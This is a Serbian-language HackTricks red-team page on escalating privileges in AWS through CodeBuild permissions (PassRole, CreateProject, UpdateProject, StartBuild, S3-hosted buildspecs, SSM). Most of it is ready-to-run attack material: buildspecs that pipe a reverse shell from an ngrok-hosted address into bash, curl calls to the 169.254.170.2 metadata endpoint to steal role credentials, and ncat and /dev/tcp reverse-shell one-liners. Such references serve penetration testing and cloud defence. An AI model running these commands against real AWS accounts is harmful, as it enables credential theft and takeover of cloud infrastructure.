AWS - Codebuild Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

codebuild

Saznajte više informacija u:

AWS - Codebuild Enum

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Napadač sa dozvolama iam:PassRole, codebuild:CreateProject, i codebuild:StartBuild ili codebuild:StartBuildBatch bi mogao da eskalira privilegije na bilo koju codebuild IAM ulogu kreiranjem pokrenute.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Potencijalni uticaj: Direktno privescovanje na bilo koju AWS Codebuild ulogu.

U Codebuild kontejneru, datoteka /codebuild/output/tmp/env.sh sadrži sve env varijable potrebne za pristup metadata kredencijalima.

Ova datoteka sadrži env varijablu AWS_CONTAINER_CREDENTIALS_RELATIVE_URI koja sadrži URL putanju za pristup kredencijalima. To će biti nešto poput /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Dodajte to URL-u http://169.254.170.2/ i bićete u mogućnosti da izvučete kredencijale uloge.

Osim toga, takođe sadrži env varijablu ECS_CONTAINER_METADATA_URI koja sadrži potpuni URL za dobijanje metadata informacija o kontejneru.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kao i u prethodnom odeljku, ako umesto kreiranja projekta za izgradnju možete da ga izmenite, možete naznačiti IAM ulogu i ukrasti token.

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potencijalni uticaj: Direktno privescovanje na bilo koju AWS Codebuild ulogu.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Kao i u prethodnom odeljku ali bez dozvole iam:PassRole, možete zloupotrebiti ove dozvole da modifikujete postojeće Codebuild projekte i pristupite ulozi koju već imaju dodeljenu.

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild-demo-project

Potencijalni uticaj: Direktno privescovanje na pridružene AWS Codebuild uloge.

SSM

Imajući dovoljno dozvola da pokrenete ssm sesiju, moguće je ući u Codebuild projekat koji se gradi.

Codebuild projekat će morati imati prekid:

phases:
pre_build:
commands:
- echo Ušli ste u pre_build fazu...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

A onda:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Za više informacija proverite dokumentaciju.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Napadač koji može da pokrene/ponovo pokrene izgradnju određenog CodeBuild projekta koji čuva svoju datoteku buildspec.yml u S3 korpi do koje napadač ima pristup za pisanje, može dobiti izvršenje komandi u procesu CodeBuild.

Napomena: eskalacija je relevantna samo ako CodeBuild radnik ima drugačiju ulogu, nadamo se privilegovaniju, od uloge napadača.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Možete koristiti nešto poput ovog builspec-a da biste dobili obrnutu ljusku:

buildspec.yml
version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Utjecaj: Direktno privesciranje uloge koju koristi radnik AWS CodeBuild-a, koja obično ima visoke privilegije.

Imajte na umu da se buildspec može očekivati u zip formatu, pa bi napadač trebao preuzeti, raspakovati, izmeniti buildspec.yml iz glavnog direktorijuma, ponovo zapakovati i otpremiti.

Više detalja možete pronaći ovde.

Potencijalni uticaj: Direktno privesciranje pridruženih uloga AWS Codebuild-a.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated